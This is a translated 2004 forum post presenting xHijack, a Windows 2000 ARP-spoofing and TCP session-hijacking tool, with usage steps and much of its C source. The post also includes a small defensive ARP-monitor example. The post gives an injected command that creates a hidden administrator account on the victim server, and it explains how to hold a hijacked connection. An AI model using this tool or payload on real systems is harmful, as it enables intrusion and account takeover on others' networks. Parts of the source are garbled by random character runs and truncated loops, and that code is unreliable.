Title: Session hijacking in a switched environment, revisited (for Windows 2000)

Author: 韩冰    Time: 2004-11-21 01:44
Step one is to enable IP routing: set the registry value
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter to 0x1 and reboot the system.
Step two is ARP spoofing; I won't go into how that works here.
Step three is the hijacking itself.

I wrote a program, xHijack, that implements steps two and three. It is used as follows:

Usage: xHijack ServerSide ClientSide

The parameters for three different situations:
<1> Server, client and hijacker are on the same LAN, attached to the same switch (or cascaded switches?).
If the server's IP is 192.168.0.2 and the client's IP is 192.168.0.3, give xHijack the following parameters:
c:\>xHijack 192.168.0.2 192.168.0.3
Data flow before hijacking: server <--> client
Data flow after hijacking: server <--> hijacker <--> client

<2> Server and hijacker are on the same LAN; the client is on another network.
If the server's IP is 202.202.202.2 and the server's gateway is 202.202.202.1, use:
xHijack 202.202.202.2 202.202.202.1
Data flow before hijacking: server <--> gw <--> routes <--> client
Data flow after hijacking: server <--> hijacker <--> gw <--> routes <--> client

<3> Client and hijacker are on the same LAN; the server is on another network.
If the client's IP is 192.168.0.2 and the gateway is 192.168.0.1, use:
xHijack 192.168.0.1 192.168.0.2
Data flow before hijacking: client <--> gw <--> routes <--> server
Data flow after hijacking: client <--> hijacker <--> gw <--> routes <--> server

After you enter the two parameters you are prompted to choose a network adapter, and then shown:
l        <-- List all connections
r x       <-- Reset the number x connection
w x       <-- Watch the number x connection
h x command   <-- Hijack the number x connection to execute command

I won't explain the list, reset and watch commands.
Suppose there is currently the following connection:
(1) 202.202.202.202:23 <--> 192.168.0.3:2345
To hijack this connection and run our command, enter
xHijack>h 1 "&net user ey4s hijack /add & net localgroup administrators ey4s /add"
Why the leading &? Suppose the client has just sent the character p. Without the &, what the server receives is
pnet user....; with the & it becomes p&net user...., so whatever the client typed beforehand, our command
still runs. All of this assumes the server is Windows 2000; what to prepend for unix I don't know, I'm a unix idiot, heh.

The hijacking sequence is:
<1> Impersonate the Server and send the Client an RST packet
<2> Impersonate the Client and send the Server a data packet
<3> The Server replies to the Client with an ACK
<4> Because the Client's connection has already been reset by us, the Client replies to the Server with an RST

This way we can only send a single forged packet, but I think that's enough.
It is also possible to hold on to the connection, as follows:
<1> Impersonate the Server and send the Client an RST packet
<2> Spoof the Client, telling it the Server's MAC address is AAAAAAAAAAAA
<3> Impersonate the Client and send the Server a data packet
<4> The Server replies to the Client with an ACK
<5> The Client sends the Server an RST, but the Server never receives it, because the Client sent it to AAAAAAAAAAAA, heh.
<6> From then on every packet the Server sends to the Client is handled by us, including ACKing the Server, and so on.

This is riskier, though: for the whole time we hold the connection, communication between Client and Server is cut off.

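As an added example from the defender's side (not part of the original post or of xHijack), here is a small ARP monitor in C that parses replies laid out exactly like the Ethernet + ARP frames the tool sends and flags the two signatures described above: an IP that suddenly claims a different MAC, and an ARP sender MAC that disagrees with the frame's own Ethernet source (the AAAAAAAAAAAA trick). Every MAC, address and frame in it is a constructed test value; `build_arp_reply` exists only to make those test frames.

```c
/* ARP-poisoning monitor over raw Ethernet/ARP frames. Added example, not xHijack code.
   Frame layout assumed: 14-byte Ethernet header followed by a 28-byte IPv4 ARP header,
   the same layout as the EHHDR + ARPHDR structs in the tool. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define EPT_ARP        0x0806   /* EtherType: ARP */
#define ARP_OP_REPLY   0x0002
#define ETH_HLEN       14       /* dst MAC, src MAC, EtherType */
#define ARP_HLEN       28       /* hrd/pro type+len, op, sender MAC/IP, target MAC/IP */
#define ARP_MAX_HOSTS  32

enum arp_verdict {
    ARP_IGNORED = 0,          /* not an ARP reply, or frame too short */
    ARP_OK = 1,               /* consistent with what has been seen before */
    ARP_BINDING_CHANGED = 2,  /* sender IP was already bound to a different MAC */
    ARP_SRC_MISMATCH = 3      /* Ethernet source MAC != ARP sender MAC */
};

typedef struct { uint32_t ip; uint8_t mac[6]; } arp_binding;
typedef struct { arp_binding hosts[ARP_MAX_HOSTS]; int count; int alerts; } arp_monitor;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

void arp_monitor_init(arp_monitor *m) { memset(m, 0, sizeof *m); }

/* Build a constructed ARP reply (42 bytes) for testing. IPs are host-order values. */
size_t build_arp_reply(uint8_t *out, const uint8_t eth_src[6], const uint8_t arp_sender_mac[6],
                       uint32_t sender_ip, const uint8_t target_mac[6], uint32_t target_ip) {
    uint8_t *a = out + ETH_HLEN;
    memcpy(out, target_mac, 6);          /* Ethernet destination */
    memcpy(out + 6, eth_src, 6);         /* Ethernet source */
    out[12] = 0x08; out[13] = 0x06;      /* EtherType ARP */
    a[0] = 0; a[1] = 1;                  /* hardware type: Ethernet */
    a[2] = 0x08; a[3] = 0x00;            /* protocol type: IPv4 */
    a[4] = 6; a[5] = 4;                  /* hardware / protocol address lengths */
    a[6] = 0; a[7] = ARP_OP_REPLY;
    memcpy(a + 8, arp_sender_mac, 6);
    for (int i = 0; i < 4; i++) a[14 + i] = (uint8_t)(sender_ip >> (24 - 8 * i));
    memcpy(a + 18, target_mac, 6);
    for (int i = 0; i < 4; i++) a[24 + i] = (uint8_t)(target_ip >> (24 - 8 * i));
    return ETH_HLEN + ARP_HLEN;
}

/* Feed one captured frame; returns the verdict and counts alerts in m->alerts. */
enum arp_verdict arp_monitor_feed(arp_monitor *m, const uint8_t *frame, size_t len) {
    if (len < ETH_HLEN + ARP_HLEN || rd16(frame + 12) != EPT_ARP) return ARP_IGNORED;
    const uint8_t *a = frame + ETH_HLEN;
    if (rd16(a + 6) != ARP_OP_REPLY) return ARP_IGNORED;
    const uint8_t *sender_mac = a + 8;
    uint32_t sender_ip = rd32(a + 14);

    /* Signature 1: the L2 source and the ARP sender hardware address disagree. */
    if (memcmp(frame + 6, sender_mac, 6) != 0) { m->alerts++; return ARP_SRC_MISMATCH; }

    /* Signature 2: the IP is already bound to another MAC. The first-seen binding is
       kept so that every further poisoned reply keeps alerting; a genuine NIC swap
       must therefore be cleared by re-initialising the monitor. */
    for (int i = 0; i < m->count; i++) {
        if (m->hosts[i].ip == sender_ip) {
            if (memcmp(m->hosts[i].mac, sender_mac, 6) == 0) return ARP_OK;
            m->alerts++;
            return ARP_BINDING_CHANGED;
        }
    }
    if (m->count < ARP_MAX_HOSTS) {
        m->hosts[m->count].ip = sender_ip;
        memcpy(m->hosts[m->count].mac, sender_mac, 6);
        m->count++;
    }
    return ARP_OK;
}

int main(void) {
    /* Constructed scenario: gateway 192.168.0.1 answers, then a second host claims it. */
    const uint8_t gw[6]   = {0x00, 0x11, 0x22, 0x33, 0x44, 0x55};
    const uint8_t host[6] = {0x00, 0xaa, 0xbb, 0xcc, 0xdd, 0xee};
    const uint8_t evil[6] = {0xde, 0xad, 0xbe, 0xef, 0x00, 0x01};
    uint8_t f[64];
    arp_monitor m;
    arp_monitor_init(&m);
    size_t n = build_arp_reply(f, gw, gw, 0xC0A80001u, host, 0xC0A80002u);
    printf("legit reply  -> %d\n", arp_monitor_feed(&m, f, n));
    n = build_arp_reply(f, evil, evil, 0xC0A80001u, host, 0xC0A80002u);
    printf("poison reply -> %d (alerts=%d)\n", arp_monitor_feed(&m, f, n), m.alerts);
    return 0;
}
```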

I've only just started reading about TCP/IP; debugging this program made my head spin, the write-up is a mess too, heh, and the code probably has plenty of problems as well.
Corrections and advice are welcome.

BTW: I have no web space, so there is nowhere to host the compiled program :(


References
<> Session hijacking in a switched environment http://www.xfocus.net/article_view.php?id=375
<> Sniffing and ARP spoofing in switched networks http://www.xfocus.net/article_view.php?id=377

The program code follows
----------------------------------------------------------------------
/*-----------------------------------------------------------------------------
File      : xHijack.c
Version      : 1.0
Create at    : 2002/8/12
Last modified at  : 2002/8/19
Author      : eyas
Email      : ey4s@21cn.com
HomePage    : www.ey4s.org
Thanks to refdom and shotgun for the source code they published; I learned a great deal from it.
If you modify the code, or add more functions, please email me a copy.

Notes:
<> IP headers and TCP headers longer than 20 bytes are not handled
<> IP fragmentation is not handled
<> The captured TCP payload is not decoded. TELNET, for example, is plaintext, but its TCP data also carries
display-format and cursor-position information, so printing it raw looks messy. IRC, SMTP, POP3 and the like
are fine.

Maybe the next version will fix these; maybe there won't be a next version.

-----------------------------------------------------------------------------*/
/* The header names were lost when the page was extracted; the ones below are an editorial
   reconstruction of what the calls in this file need (C runtime, Winsock, Win32, IP Helper,
   packet.dll and NDIS filter constants). */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <windows.h>
#include <iphlpapi.h>
#include <packet32.h>
#include <ntddndis.h>

#pragma comment (lib, "packet")
#pragma comment (lib, "iphlpapi")
#pragma comment (lib, "ws2_32")

#define Max_Num_Adapter 10
#define Max_Num_IPAddr  5
#define EPT_IP      0x0800      /* type: IP  */
#define ARP_HARDWARE  0x0001      /* Dummy type for 802.3 frames */
#define EPT_ARP      0x0806      /* type: ARP */

#define  ACTION_NONE    0
#define  ACTION_WATCH  1
#define  ACTION_RESET  2
#define ACTION_HIJACK  3

/* 1-byte alignment */
#pragma pack(1)
typedef struct _ehhdr
{
  unsigned char  DestMAC[6];
  unsigned char  SourceMAC[6];
  unsigned short  EthernetType;
}EHHDR, *PEHHDR;

typedef struct _iphdr        //IP header
{
  unsigned char h_verlen;      //4-bit header length, 4-bit IP version
  unsigned char tos;        //8-bit type of service (TOS)
  unsigned short total_len;    //16-bit total length (bytes)
  unsigned short ident;      //16-bit identification
  unsigned short frag_and_flags;  //3-bit flags, 13-bit fragment offset
  unsigned char ttl;        //8-bit time to live (TTL)
  unsigned char proto;      //8-bit protocol (TCP, UDP or other)
  unsigned short checksum;    //16-bit IP header checksum
  unsigned int sourceIP;      //32-bit source IP address
  unsigned int destIP;      //32-bit destination IP address
}IPHDR, *PIPHDR;

typedef struct _tcphdr        //TCP header
{
  USHORT th_sport;        //16-bit source port
  USHORT th_dport;        //16-bit destination port
  unsigned int th_seq;      //32-bit sequence number
  unsigned int th_ack;      //32-bit acknowledgement number
  unsigned char th_lenres;    //4-bit header length / 6-bit reserved
  unsigned char th_flag;      //6-bit flags
  USHORT th_win;          //16-bit window size
  USHORT th_sum;          //16-bit checksum
  USHORT th_urp;          //16-bit urgent pointer
}TCPHDR, *PTCPHDR;

typedef struct _psdhdr        //TCP pseudo header
{
  unsigned long saddr;
  unsigned long daddr;
  char mbz;
  char ptcl;
  unsigned short tcpl;
}PSDHDR, *PPSDHDR;

typedef struct _arphdr
{
  unsigned short  HrdType;//hardware type
  unsigned short  ProType;//protocol type
  unsigned char  HrdAddrlen;//hardware address length
  unsigned char  ProAddrLen;//protocol address length
  unsigned short  op;//operation
  unsigned char  SourceMAC[6];/* sender hardware address */
  unsigned long  SourceIP;/* sender protocol address */
  unsigned char  DestMAC[6];/* target hardware address */
  unsigned long  DestIP;/* target protocol address */
}ARPHDR, *PARPHDR;

typedef struct _ArpPacket
{
  EHHDR  ehhdr;
  ARPHDR  arphdr;
}ARPPACKET, *PARPPACKET;

typedef struct _tcppacket
{
  EHHDR  ehhdr;
  IPHDR  iphdr;
  TCPHDR  tcphdr;
}TCPPACKET, *PTCPPACKET;

typedef struct _conninfo
{
  DWORD  dwServerIP;
  USHORT  uServerPort;
  DWORD  dwClientIP;
  USHORT  uClientPort;
  DWORD  ident;//identifier
  BOOL  bActive;
  struct  _conninfo  *Next;
}CONNINFO, *PCONNINFO;

//global variables
unsigned int  g_ServerSideIP,
        g_ClientSideIP,
        g_OwnIP[Max_Num_IPAddr],//list of local IP addresses
        g_TotalIP = 0;//
unsigned char  g_szOwnMAC[6];//local MAC address
unsigned char  g_szClientSideMAC[6];
unsigned char  g_szServerSideMAC[6];
char      g_szTcpFlag[6] = {'F','S','R','P','A','U'};//TCP flag letters
LPADAPTER    g_lpAdapter;
//1 and 2 is arp spoof thread, 3 is recv packets thread, 4 is interface thread
HANDLE      g_hThread[4];
char      g_szCommand[128];//command to execute after hijack
DWORD      g_dwAction;//action type
DWORD      g_dwCtrlConn;//identifier of the connection the action controls
DWORD      g_ident;//node identifier, incremented for each new connection
PCONNINFO    g_pCurrCtrlConn = NULL,//info struct of the connection currently controlled by the action
        g_pConnHead = NULL,
        g_pConnLast = NULL;
char      g_szSendPacketBuf[1514];
LPPACKET    g_lpSendPacket;
//functions
void      usage(void);
void      ShowPacketMoreInfo(PTCPPACKET, USHORT, BOOL);
void      ListAllConnection();//list all current connections
void      ResetActionAllFlag();
USHORT      checksum(USHORT *, int);
BOOL      GetMACAddr(DWORD DestIP, char *pMAC);//get the MAC address of the target IP
BOOL      IsACKPacket(unsigned char);//is this a pure ACK packet?
LPADAPTER    InitAdapter();//initialise some parameters and global variables
BOOL      SendRstPacket(unsigned int, unsigned int);//impersonate the server and send the client an RST
BOOL      SendHiJackPacket(PTCPPACKET);//impersonate the client and send the server our packet
DWORD      GetConnNum(char *, DWORD, DWORD *);
DWORD      CtrlConnInfoLink(DWORD, USHORT, DWORD, USHORT, BOOL, BOOL);
DWORD  WINAPI  ArpSpoofThread(LPVOID);//ARP spoofing thread
DWORD  WINAPI  AnalysePacketsThread(LPVOID);//analyse and handle received packets
DWORD  WINAPI  InterfaceThread(LPVOID);//
BOOL  WINAPI  CtrlEvent(DWORD);

int main(int argc, char **argv)
{
  struct    bpf_stat stat;
  int      i;

  usage();
  if (argc != 3) return 0;
  //read the arguments
  g_ServerSideIP = inet_addr(argv[1]);
  g_ClientSideIP = inet_addr(argv[2]);
  //initialise the adapter & some global variables
  g_lpAdapter = InitAdapter();
  if(!g_lpAdapter) return 0;
  //get ServerSide MAC & ClientSide MAC
  if(!GetMACAddr(g_ServerSideIP, g_szServerSideMAC)) return 0;
  if(!GetMACAddr(g_ClientSideIP, g_szClientSideMAC)) return 0;
  //create arp spoof thread (both threads read i through a pointer; the Sleep gives
  //the first thread time to copy it before it is reassigned)
  i = 1;
  g_hThread[0] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  Sleep(500);
  i = 2;
  g_hThread[1] = CreateThread(NULL, 0, ArpSpoofThread, &i, 0, 0);
  //create analyse packet thread
  g_hThread[2] = CreateThread(0, 0, AnalysePacketsThread, NULL, 0, 0);
  //create interface thread
  g_hThread[3] = CreateThread(0, 0, InterfaceThread, NULL, 0, 0);
  //set console ctrl handle
  if(!SetConsoleCtrlHandler(CtrlEvent, TRUE))
  {
    printf("SetConsoleCtrlHandler error:%d\n", GetLastError());
    return 0;
  }
  //wait for any thread exit
  WaitForMultipleObjects(4, g_hThread, FALSE, INFINITE);
  //print the capture statistics
  if(PacketGetStats(g_lpAdapter, &stat) == FALSE)
    printf("Warning: unable to get stats from the kernel!\n");
  else
    printf("\n\n%d packets received.\n%d Packets lost\n",stat.bs_recv,stat.bs_drop);
  //free resource
  PacketFreePacket(g_lpSendPacket);
  PacketCloseAdapter(g_lpAdapter);
  return 0;
}

//
//Function: reset all ACTION-related flags
//
void ResetActionAllFlag()
{
  g_dwCtrlConn = 0;
  g_pCurrCtrlConn = NULL;
  g_dwAction = ACTION_NONE;
}

//
//Function: handle the Ctrl+C and Ctrl+Break events
//
BOOL WINAPI CtrlEvent(DWORD dwCtrlType)
{
  switch(dwCtrlType)
  {
    case CTRL_BREAK_EVENT:
      //reset action all flag
      ResetActionAllFlag();
      break;
    case CTRL_C_EVENT:
      //terminate all thread
      TerminateThread(g_hThread[0], 0);
      TerminateThread(g_hThread[1], 0);
      TerminateThread(g_hThread[2], 0);
      TerminateThread(g_hThread[3], 0);
      break;
    default:
      break;
  }
  return TRUE;
}

//
//Function: parse user input
//
DWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos)
{
  DWORD  i;
  char  szBuff[16];

  *lpCommandPos = 0;
  for(i=0; i<15, i
//... the code is rather messy
//
DWORD WINAPI InterfaceThread(LPVOID lp)
{
  char  szHelp[] =  "l\t\t<-- List all connections\n"
            "r x\t\t<-- Reset the number x connection\n"
            "w x\t\t<-- Watch the number x connection\n"
            "h x command\t<-- Hijack the number x connection to execute command\n"
            "[Note]\n"
            "Ctrl+Break to clear all action\n"
            "Ctrl+C to exit\n";
  char  szPrompt[] = "\nxHijack>";
  char  szBuffer[128];
  DWORD  dwPos;
  PCONNINFO  pTmp;

  while(1)
  {
    //read one command line; the original used gets() with no bounds check, so the
    //read is bounded here and the trailing newline stripped to keep the lengths below the same
    if(!fgets(szBuffer, sizeof(szBuffer), stdin)) break;
    szBuffer[strcspn(szBuffer, "\r\n")] = 0;
    switch(szBuffer[0])
    {
      case 'l':
      case 'L':
        ListAllConnection();
        break;
      case 'r':
      case 'R':
        if(strlen(szBuffer) >2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_RESET;
        }
        else printf("%s", szHelp);
        break;
      case 'w':
      case 'W':
        if(strlen(szBuffer) > 2)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          g_dwAction = ACTION_WATCH;
        }
        else printf("%s", szHelp);
        break;
      case 'h':
      case 'H'://h 1 xxx
        if(strlen(szBuffer) > 5)
        {
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
          //if the first character of command is ' or "
          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') )
          {
            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3);
            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//strip the closing ' or "
          }
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3);
          strcat(g_szCommand, "\x0D\x0A");
          g_dwAction = ACTION_HIJACK;
        }
        else printf("%s", szHelp);
        break;
      default:
        printf("%s", szHelp);
        break;
    }//end of switch
    //find the specify ident's struct point
    if( (g_dwCtrlConn) && (g_dwAction) )
    {
      g_pCurrCtrlConn = NULL;
      pTmp = g_pConnHead;
      while(pTmp)
      {
        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) )
        {
          g_pCurrCtrlConn = pTmp;
          break;
        }
        pTmp = pTmp->Next;
      }
      if(!g_pCurrCtrlConn)
      {
        printf("Can't find the number %d connection.\n", g_dwCtrlConn);
        //reset action all flag
        ResetActionAllFlag();
      }
    }
    if(!g_dwCtrlConn) ResetActionAllFlag();
    //show the action the user currently wants
    printf("\nCurrentAction:");
    switch(g_dwAction)
    {
      case ACTION_WATCH:
        printf("ACTION_WATCH");
        break;
      case ACTION_RESET:
        printf("ACTION_RESET");
        break;
      case ACTION_HIJACK:
        printf("ACTION_HIJACK");
        break;
      default:
        printf("ACTION_NONE");
        break;
    }
    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt);
  }//end of while
  return 0;
}
//
//Function: list all current connections
//
void ListAllConnection()
{
  PCONNINFO pTmp;
  SOCKADDR_IN saDest, saSource;

  pTmp = g_pConnHead;
  while(pTmp)
  {
    if(pTmp->bActive)
    {
      saSource.sin_addr.s_addr = pTmp->dwServerIP;
      saDest.sin_addr.s_addr = pTmp->dwClientIP;
      printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr),
        ntohs(pTmp->uServerPort));
      printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort));
    }
    pTmp = pTmp->Next;
  }
}

//
//Function: initialise some data; get the MAC address and all IP addresses of the chosen adapter
//
LPADAPTER InitAdapter()
{
  LPADAPTER lpAdapter;
  static char AdapterList[Max_Num_Adapter][1024];
  char szSelectAdapterName[512];
  WCHAR AdapterName[2048];
  WCHAR *temp,*temp1;
  ULONG AdapterLength = 1024;
  int iAdapterNum = 0;
  int iRetCode, i;
  int iAdapter = 0;
  ULONG ulLen = 0;
  DWORD dwRet;
  PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp;
  PIP_ADDR_STRING pIPAddr;

  //Get The list of Adapter
  if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
  {
    printf("Unable to retrieve the list of the adapters!\n");
    return 0;
  }
  //the names come back as a double-NUL-terminated list of wide strings
  temp = temp1 = AdapterName;
  i = 0;
  while ((*temp != '\0')||(*(temp-1) != '\0'))
  {
    if (*temp == '\0')
    {
      memcpy(AdapterList[i],temp1,(temp-temp1)*2);
      printf("%d - %S\n", i+1, AdapterList[i]);
      temp1=temp+1;
      i++;
    }
    temp++;
  }
  //choose adapter
  while((iAdapter <= 0) || (iAdapter > i))
  {
    printf("\nPlease choose your Adapter:");
    scanf("%1d", &iAdapter);
  }
  printf("\n");
  //---------------------------------------------//
  //use iphlpapi here to get the local ip_addr and mac_addr
  _snprintf(szSelectAdapterName, sizeof(szSelectAdapterName)-1, "%S", AdapterList[iAdapter -1]);
  szSelectAdapterName[sizeof(szSelectAdapterName)-1] = 0;
  dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen);
  if(dwRet != ERROR_BUFFER_OVERFLOW)
  {
    printf("GetAdapterInfo error:%d\n", GetLastError());
    return 0;
  }
  pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen);
  if(!pAdapterInfo)
  {
    printf("malloc memory for pAdapterInfo error:%d\n", GetLastError());
    return 0;
  }
  dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen);
  if(dwRet != ERROR_SUCCESS)
  {
    printf("GetAdapterInfo error:%d\n", GetLastError());
    return 0;
  }
  pTmp = pAdapterInfo;
  while(pTmp)
  {
    //string match
    if(strstr(szSelectAdapterName, pTmp->AdapterName))
    {
      //found it,get own adapter mac address
      memcpy(g_szOwnMAC, pTmp->Address, 6);
      //get ip address
      pIPAddr = &pTmp->IpAddressList;
      while(pIPAddr)
      {
        g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress);
        pIPAddr = pIPAddr->Next;
        if(g_TotalIP >= Max_Num_IPAddr) break;
      }
      break;
    }
    pTmp = pTmp->Next;
  }
  free(pAdapterInfo);
  //not found,return zero
  if( (!pTmp) || (!g_TotalIP) ) return 0;
  //---------------------------------------------//
  //open adapter
  lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]);
  if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
  {
    iRetCode = GetLastError();
    printf("Unable to open the driver, Error Code : %lx\n", iRetCode);
    return 0;
  }
  // set the network adapter in promiscuous mode
  if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE)
  {
    printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n");
    if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE)
    {
      printf("Unable to set ALL_LOCAL mode!\n");
      return 0;
    }
  }
  // set a 512K buffer in the driver
  if(PacketSetBuff(lpAdapter, 512000) == FALSE)
  {
    printf("Unable to set the kernel buffer!\n");
    return 0;
  }
  // set a 1 second read timeout
  if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE)
    printf("Warning: unable to set the read timeout!\n");
  if(PacketSetNumWrites(lpAdapter, 1) == FALSE)
    printf("warning: Unable to send more than one packet in a single write!\n");
  //set up the packet used for sending
  g_lpSendPacket = PacketAllocatePacket();
  if(g_lpSendPacket == NULL)
  {
    printf("Error:failed to allocate the LPPACKET structure for send packet.\n");
    return 0;
  }
  ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf));
  PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514);
  return lpAdapter;
}

//Function: help text
void usage()
{
  printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n"
    "By eyas 2002/8/19\n"
    "http://www.ey4s.org\n"
    "Thanks to Refd0m and shotgun\n\n"
    "Usage: xHijack ServerSide ClientSide\n\n");
}

//
//Function: show some details of a packet
//
VOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail)
{
  SOCKADDR_IN saDest, saSrc;
  unsigned char FlagMask;
  int i;

  saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP;
  saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP;
  printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport));
  printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr),
    ntohs(pTCPPacket->tcphdr.th_dport), usDataLen);
  //display TCP flag
  for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1)
  {
    if((pTCPPacket->tcphdr.th_flag) & FlagMask)
      printf("%c", g_szTcpFlag[i]);
    else printf("-");
  }
  printf("\n");
  //show more detail if requested
  if(bDetail)
    printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack));
}

//
//Function: handle received packets (only those not addressed to this host are analysed), then carry out the requested action according to user input
//
DWORD WINAPI AnalysePacketsThread(LPVOID lp)
{
  ULONG ulBytesReceived;
  USHORT usDataLen;
j //USHORT usIPHeadLen, usTCPHeadLen; 3 P4 j7 v* N% V char *buf; * K4 k- M1 \- \* j3 Q0 I( B u_int off, i; 4 d n( ?& j- J7 ?' _ PTCPPACKET pTCPPacket; ! d: K; ^/ Q' B' q0 m5 D) r struct bpf_hdr *hdr; 9 g! p: B: R# b- ~- ?! [+ ?$ j LPPACKET lpRecvPacket; % m- d$ o' L: u3 z" P6 a/ j char szPacketBuf[256000], *pStr; 5 E, r! |' ]# z/ C BOOL bDeleteNode, bAddNew; 2 X: }" i# a/ | DWORD ident;//当前所处理的数据包,所属的连接的唯一标识 7 k! d2 R0 a7 R6 U BOOL bClientToServer;//数据包是否从客户端发送到服务器端 # R4 ]- H* W& H5 \ # I% q% z+ X* z2 |& b //设置接收的packet ' }6 ?9 ^& J+ v" m' H3 V( H lpRecvPacket = PacketAllocatePacket(); & B1 D; b# W, Q* u- k, C6 T if(lpRecvPacket == NULL) % ~2 {' M" U6 y3 ?3 c$ A { : @+ |( o* A5 e% @2 w( B; p printf("Error:failed to allocate the LPPACKET structure for recv.\n"); - d4 w& B$ K4 w) k return 0; * H' V' E* u* A2 u4 U } ( t4 U$ ^( A. G3 r$ h ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); ' D+ u$ B% v$ s* y# u PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); ) B: ?/ o5 k) w! Y' y while(1) 7 l' x" ?5 [2 ^/ J { 7 v4 l& W/ k; M$ A9 X$ ^+ g$ v* d // capture the packets . T$ ^& ]$ V$ X5 j0 j( ^. R5 P if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) : C/ A2 {( ]+ |4 H/ Q- l4 l2 ?7 o { 1 o( t. v6 \) c9 {2 R) t9 | printf("Error: PacketReceivePacket failed.\n"); / F" M3 ]* w, d% y1 w2 T9 J break; & O. ]. B3 t P" {6 ]8 M/ T& a } 4 y2 J& I( g: O$ b* t; U ulBytesReceived = lpRecvPacket->ulBytesReceived; $ J7 F- r6 y8 X buf = lpRecvPacket->Buffer; " u/ G! c& W! f% h6 W/ I- c off = 0; ! H+ K: U# w- I$ B6 `# s while(off < ulBytesReceived) - Q& D( I, _! X { 4 H5 _. R* v& s4 |8 e hdr = (struct bpf_hdr *)(buf + off); $ m. h9 @0 u& V* G2 _ off += hdr->bh_hdrlen; ' ?/ C4 l O) j# @ pTCPPacket = (PTCPPACKET)(buf + off); 4 Q6 y2 F2 ~$ }- l1 a& ~, P- p off = Packet_WORDALIGN(off + hdr->bh_caplen); % b. S( s5 l# s //不需要处理自己发出的包(转发或本机发送的) % I1 p# ~/ S* I! G. V4 M2 T if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; 0 c6 z7 L0 Q [: A0 n; }( o //检查是否IP包 . 
^( ^6 Y9 G6 I. c if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; # g, S/ s0 Q5 K! z/ t% x //检查是否TCP包 " }* d$ I, P4 F3 G# J( w- Z if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; 6 h% a. s L4 T+ K; O$ y //也不处理DestIP是自己的包 & ?6 O+ D/ d' p9 r# G$ T9 b for(i=0; i
            /* fragment: the listing resumes with the tail of a
               CtrlConnInfoLink(..., bDelete=TRUE, bAddNew=FALSE) call that marks
               the reset connection inactive */
            pTCPPacket->iphdr.sourceIP, pTCPPacket->tcphdr.th_sport, TRUE, FALSE);
            //reset action flag
            ResetActionAllFlag();
          }
          //start hijack
          else if(g_dwAction == ACTION_HIJACK)
          {
            //send rst packet to the client, posing as the server, so the client drops out
            SendRstPacket(pTCPPacket->tcphdr.th_ack, pTCPPacket->tcphdr.th_seq);
            //send the hijack packet to the server, posing as the client
            SendHiJackPacket(pTCPPacket);
            //reset action flag
            ResetActionAllFlag();
          }
        }
        //show the tcp data
        if( (g_dwAction == ACTION_WATCH) && (usDataLen) )
        {
          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE);
          //IP/TCP headers longer than 20 bytes (options) are not handled yet
          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
          pStr = (char *)pTCPPacket + 54;
          /* for(i=0; i ...
             the loop over the usDataLen payload bytes at pStr (presumably printing
             them) was lost in the forum extraction and is not reconstructed here */
        }
      }
      //debug output
      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE);
    }//end of analyse packets while
  }//end of recv packets while
